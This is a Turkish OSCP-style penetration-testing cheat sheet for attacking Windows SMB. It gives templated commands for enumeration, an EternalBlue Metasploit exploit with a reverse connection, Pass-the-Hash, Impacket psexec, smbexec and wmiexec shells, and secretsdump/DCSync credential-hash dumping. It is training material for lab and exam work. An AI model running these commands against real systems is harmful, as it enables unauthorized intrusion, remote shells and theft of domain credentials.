FOOTHOLD Metodoloji Cheat-sheet
445

SMB / CIFS (139 NetBIOS dahil)

windows

445/139 Windows dosya paylasimi ve named-pipe RPC'nin ana saldiri yuzeyidir: null session ve kimlikli enumerasyon (netexec/enum4linux-ng/smbmap), share spider ve RID brute, MS17-010 (EternalBlue) tespiti, Pass-the-Hash ve Impacket exec metodlari (psexec/smbexec/wmiexec) ile foothold ve lateral movement.

┌──

Komutlar

netexec ✓ EXAM-SAFE
netexec smb {{RHOST}}
SMB host fingerprint: OS surumu, hostname/domain, SMB signing durumu, SMBv1 varligi. NetExec — SMB enumeration
netexec ✓ EXAM-SAFE
netexec smb {{RHOST}} -u '' -p '' --shares
Null session ile anonim share listeleme ve izin tespiti. NetExec — null session shares
enum4linux-ng ✓ EXAM-SAFE
enum4linux-ng -A {{RHOST}}
Kapsamli otomatik SMB/RPC enum: kullanicilar, gruplar, share, parola politikasi, OS bilgisi. HackTricks — Pentesting SMB / enum4linux-ng
smbclient ✓ EXAM-SAFE
smbclient -L //{{RHOST}}/ -N
Anonim (null) olarak paylasimlari listele. HackTricks — Pentesting SMB
smbmap ✓ EXAM-SAFE user
smbmap -H {{RHOST}} -u '{{USER}}' -p '{{PASS}}'
Share'leri ve her birinde READ/WRITE izinlerini hizlica haritalayin. HackTricks — smbmap
smbclient ✓ EXAM-SAFE user
smbclient //{{RHOST}}/SHARE -U '{{DOMAIN}}\{{USER}}%{{PASS}}'
Belirli bir share'e baglanip dosya gez/indir (get/mget). HackTricks — Pentesting SMB
netexec ✓ EXAM-SAFE user
netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' --shares --users --groups --pass-pol
Kimlikli genis enum: share + kullanici + grup + parola politikasi. NetExec — authenticated enumeration
netexec ✓ EXAM-SAFE user
netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' --rid-brute
RID cycling ile domain/lokal kullanici listesi cikar (SID brute). NetExec — RID brute
netexec ✓ EXAM-SAFE user
netexec smb {{RHOST}} -u '{{USER}}' -p '{{PASS}}' -M spider_plus
Tum okunabilir share'leri otomatik spider'la, ilginc dosyalari listele. NetExec — spider_plus module
nmap ✓ EXAM-SAFE
nmap -n -p445 --script smb-vuln-ms17-010 {{RHOST}}
MS17-010 (EternalBlue) manuel tespiti — OSCP-safe. Nmap NSE — smb-vuln-ms17-010
netexec ✓ EXAM-SAFE
netexec smb {{RHOSTS}} -M ms17-010
Subnet genelinde MS17-010 zafiyet taramasi (tespit, exploit degil). NetExec — ms17-010 module
metasploit ⚠ RESTRICTED
msfconsole -q -x 'use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS {{RHOST}}; set LHOST {{LHOST}}; run'
EternalBlue MSF modulu — OSCP'de RESTRICTED (otomatik exploit kotasi). Once manuel AutoBlue tercih edin. TJnull OSCP guide — MS17-010 note
netexec ✓ EXAM-SAFE user
netexec smb {{RHOST}} -u '{{USER}}' -H {{NTHASH}}
Pass-the-Hash ile kimlik dogrulama; '(Pwn3d!)' ciktisi local admin demektir. NetExec — Pass-the-Hash
impacket-psexec ✓ EXAM-SAFE admin
impacket-psexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}}
ADMIN$ + servis olusturma ile SYSTEM shell (gurultulu). Impacket — psexec
impacket-psexec ✓ EXAM-SAFE admin
impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}}
PtH ile psexec → SYSTEM (parola gerektirmez). Impacket — psexec (PtH)
impacket-smbexec ✓ EXAM-SAFE admin
impacket-smbexec {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}}
Servis tabanli, diske binary atmayan daha sessiz exec metodu. Impacket — smbexec
impacket-secretsdump ✓ EXAM-SAFE admin
impacket-secretsdump {{DOMAIN}}/{{USER}}:'{{PASS}}'@{{RHOST}}
SAM + LSA secrets (+ DC ise NTDS.dit) hash dump → PtH zincirini besler. Impacket — secretsdump
impacket-secretsdump ✓ EXAM-SAFE admin
impacket-secretsdump -just-dc -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{DC_IP}}
DCSync — DA/replication yetkisiyle DC'den tum domain hash'lerini ceker. Impacket — secretsdump (DCSync)
evil-winrm ✓ EXAM-SAFE user
evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}}
5985 aciksa PtH ile interaktif PowerShell shell (psexec'e sessiz alternatif). WADComs — evil-winrm PtH

SMB (139/445) Genel Bakis

445/tcp modern SMB; 139/tcp eski NetBIOS-over-TCP tasiyicisidir. SMB sadece dosya paylasimi degildir — uzerinde named pipe’lar (samr, lsarpc, srvsvc, svcctl, spoolss) calisir; kullanici/grup enumerasyonu, RID brute, servis olusturma (PsExec) ve secret dump hep buradan gecer. OSCP’de neredeyse her Windows kutusunda ilk durak budur.

Enumeration — Kimliksiz / Null Session

  • Protokol/imza bilgisi: netexec smb {{RHOST}} host’un OS surumunu, domain/hostname’i, SMB signing durumunu (relay icin kritik) ve SMBv1 varligini gosterir.
  • Null session: anonim olarak share, kullanici ve parola politikasi cekmeye calisin (-u '' -p ''). enum4linux-ng bunu otomatiklestirir.
  • Share listeleme: smbmap ve smbclient -L ile paylasim ve READ/WRITE izinleri.
  • RID cycling: SID tabaninda RID brute ile kullanici listesi cikarin (netexec ... --rid-brute).

Enumeration — Kimlikli

Gecerli {{USER}}/{{PASS}} ya da {{NTHASH}} varsa:

  • Tum share’leri spider’layin, ilginc dosyalari (config, .kdbx, unattend.xml, Groups.xml/GPP cpassword) cekin.
  • --users --groups --pass-pol --loggedon-users ile domain bilgisini genisletin.
  • --shares ile yazilabilir share arayin (DLL hijack / SCF / lnk poisoning adayi).

Bilinen Zafiyet — MS17-010 (EternalBlue)

  • Manuel tespit (OSCP-safe): nmap --script smb-vuln-ms17-010 veya netexec ... -M ms17-010. SMBv1 acik + yamasiz Windows 7/2008 → guclu aday.
  • Exploitation: OSCP’de tercih edilen yol AutoBlue (zzz_exploit.py / eternalblue_doublepulsar python) gibi manuel exploitlerdir. Metasploit ms17_010_eternalblue modulu calisir ama OSCP restricted sayar — sinavda yalnizca tek otomatik exploit hakkiniz olabilir, bilincli kullanin.

Pass-the-Hash & Exec Metodlari

NT hash ele gectiginde parola gerekmez:

  • impacket-psexec: ADMIN$‘a binary atar, servis olusturur → SYSTEM. Gurultulu, event log birakir.
  • impacket-smbexec: servis tabanli ama disk’e binary atmadan, daha sessiz; semi-interaktif.
  • impacket-wmiexec: 135/WMI uzerinden, servis kurmaz, en sessizi.
  • impacket-atexec: Task Scheduler ile tek komut. Local admin hash’i ile lateral movement icin netexec smb ... -x veya bu metodlardan birini kullanin.

Loot — secretsdump

Local admin/DA yetkisiyle impacket-secretsdump SAM, LSA secrets ve (DC ise) DRSUAPI ile NTDS.dit hash’lerini ceker. Cikan hash’ler PtH zincirini besler. Mimikatz/lsassy bellekten plaintext/ticket toplar.

Notlar

  • SMB signing kapali ise NTLM relay (ntlmrelayx) mumkun; rpcdump’taki coercion (PrinterBug/PetitPotam) ile birlestirin.
  • Hicbir komutta sabit IP yok; hedefi {{RHOST}}/{{RHOSTS}}, DC’yi {{DC_IP}} ile verin. Kimlik daima token: {{USER}} {{PASS}} {{NTHASH}} {{DOMAIN}}.
┌──

İlgili teknikler

Impacket Suite: PsExec/WMIExec/SMBExec, Secretsdump, Kerberos Saldirilari ve NTLM RelayMimikatz: Credential Dumping, Pass-the-Hash ve DCSync Cekirdek ModulleriWindows Privilege Escalation — Enumeration Methodology (winPEAS, Seatbelt, PowerUp, accesschk)Saklanan Kimlik Bilgileri — cmdkey, Unattend, GPP, Credential Manager, SAM
┌──

Kaynaklar

↗ HackTricks — 139,445 Pentesting SMB↗ NetExec (CrackMapExec successor) — SMB↗ Impacket — psexec / smbexec / wmiexec / secretsdump↗ TJnull PWK / OSCP guide — SMB & MS17-010
0/15 set